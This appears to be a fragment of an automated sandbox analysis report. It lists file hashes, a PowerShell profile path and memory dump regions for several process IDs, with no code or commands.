    MD5: 56efdb5a0f10b5eece165de4f8c9d799
    SHA1: fa5de7ca343b018c3bfeab692545eb544c244e16
    SHA256: 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
    SHA512: 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: d61d7f65117823a52913b840feed43c6
    SHA1: e2580207e1611dcb229ee9d2b4bb0bd4dbcc884f
    SHA256: d0d50cb4ab1fe4b5dcb9c081d49b33381336fc0ebc7629702ed94d47f7032a86
    SHA512: e4cf12f3642ce8746f39bcfaa6265d105919d1cbe863119f4413aa4c5d307d7d69f0638bd0434d47f651e183ec209f02dd7d44954c790ef4d585155817ed8a3c

memory/316-64-0x0000000070240000-0x000000007028B000-memory.dmp
    Filesize: 300KB

memory/316-65-0x00000000096D0000-0x00000000096EE000-memory.dmp
    Filesize: 120KB

memory/316-72-0x0000000009C10000-0x0000000009CA4000-memory.dmp
    Filesize: 592KB

memory/316-73-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-63-0x0000000009710000-0x0000000009743000-memory.dmp
    Filesize: 204KB

memory/316-66-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-166-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-44-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-45-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-46-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-158-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/316-71-0x0000000009970000-0x0000000009A15000-memory.dmp
    Filesize: 660KB

memory/584-256-0x0000022D64A80000-0x0000022D64AA5000-memory.dmp
    Filesize: 148KB

memory/584-257-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmp
    Filesize: 172KB

memory/584-258-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmp
    Filesize: 172KB

memory/584-264-0x0000022D64AB0000-0x0000022D64ADB000-memory.dmp
    Filesize: 172KB

memory/584-265-0x00007FFF884F0000-0x00007FFF88500000-memory.dmp
    Filesize: 64KB

memory/636-275-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmp
    Filesize: 172KB

memory/636-269-0x000001F3C7E60000-0x000001F3C7E8B000-memory.dmp
    Filesize: 172KB

memory/636-276-0x00007FFF884F0000-0x00007FFF88500000-memory.dmp
    Filesize: 64KB

memory/728-287-0x00007FFF884F0000-0x00007FFF88500000-memory.dmp
    Filesize: 64KB

memory/728-280-0x0000029A1F940000-0x0000029A1F96B000-memory.dmp
    Filesize: 172KB

memory/728-286-0x0000029A1F940000-0x0000029A1F96B000-memory.dmp
    Filesize: 172KB

memory/908-291-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmp
    Filesize: 172KB

memory/908-297-0x000001FAEE580000-0x000001FAEE5AB000-memory.dmp
    Filesize: 172KB

memory/908-298-0x00007FFF884F0000-0x00007FFF88500000-memory.dmp
    Filesize: 64KB

memory/1004-302-0x0000028C31FC0000-0x0000028C31FEB000-memory.dmp
    Filesize: 172KB

memory/1280-218-0x0000023BB1900000-0x0000023BB1922000-memory.dmp
    Filesize: 136KB

memory/1280-240-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
    Filesize: 1.9MB

memory/1280-221-0x0000023BC9F50000-0x0000023BC9FC6000-memory.dmp
    Filesize: 472KB

memory/1280-239-0x0000023BC9EF0000-0x0000023BC9F1A000-memory.dmp
    Filesize: 168KB

memory/1280-241-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmp
    Filesize: 696KB

memory/1616-253-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/1616-242-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/1616-248-0x00007FFFC8460000-0x00007FFFC863B000-memory.dmp
    Filesize: 1.9MB

memory/1616-244-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/1616-245-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/1616-243-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/1616-247-0x0000000140000000-0x0000000140008000-memory.dmp
    Filesize: 32KB

memory/1616-249-0x00007FFFC6D40000-0x00007FFFC6DEE000-memory.dmp
    Filesize: 696KB

memory/3080-205-0x0000000009480000-0x00000000094BE000-memory.dmp
    Filesize: 248KB

memory/3080-213-0x0000000009A90000-0x0000000009A9A000-memory.dmp
    Filesize: 40KB

memory/3080-204-0x0000000006D80000-0x0000000006D92000-memory.dmp
    Filesize: 72KB

memory/3080-201-0x00000000094E0000-0x0000000009572000-memory.dmp
    Filesize: 584KB

memory/3080-200-0x0000000009330000-0x000000000939C000-memory.dmp
    Filesize: 432KB

memory/4608-30-0x0000000009F60000-0x000000000A5D8000-memory.dmp
    Filesize: 6.5MB

memory/4608-12-0x0000000007FA0000-0x0000000007FBC000-memory.dmp
    Filesize: 112KB

memory/4608-25-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/4608-14-0x0000000008810000-0x0000000008886000-memory.dmp
    Filesize: 472KB

memory/4608-6-0x00000000076A0000-0x00000000076C2000-memory.dmp
    Filesize: 136KB

memory/4608-0-0x000000007366E000-0x000000007366F000-memory.dmp
    Filesize: 4KB

memory/4608-32-0x0000000003280000-0x0000000003288000-memory.dmp
    Filesize: 32KB

memory/4608-203-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/4608-3-0x0000000004C40000-0x0000000004C76000-memory.dmp
    Filesize: 216KB

memory/4608-13-0x0000000008790000-0x00000000087DB000-memory.dmp
    Filesize: 300KB

memory/4608-9-0x0000000008140000-0x0000000008490000-memory.dmp
    Filesize: 3.3MB

memory/4608-31-0x00000000094E0000-0x00000000094FA000-memory.dmp
    Filesize: 104KB

memory/4608-34-0x000000000B5E0000-0x000000000BADE000-memory.dmp
    Filesize: 5.0MB

memory/4608-7-0x0000000007740000-0x00000000077A6000-memory.dmp
    Filesize: 408KB

memory/4608-8-0x0000000007E70000-0x0000000007ED6000-memory.dmp
    Filesize: 408KB

memory/4608-4-0x0000000073660000-0x0000000073D4E000-memory.dmp
    Filesize: 6.9MB

memory/4608-5-0x0000000007840000-0x0000000007E68000-memory.dmp
    Filesize: 6.2MB

memory/4608-33-0x0000000009780000-0x00000000097E2000-memory.dmp
    Filesize: 392KB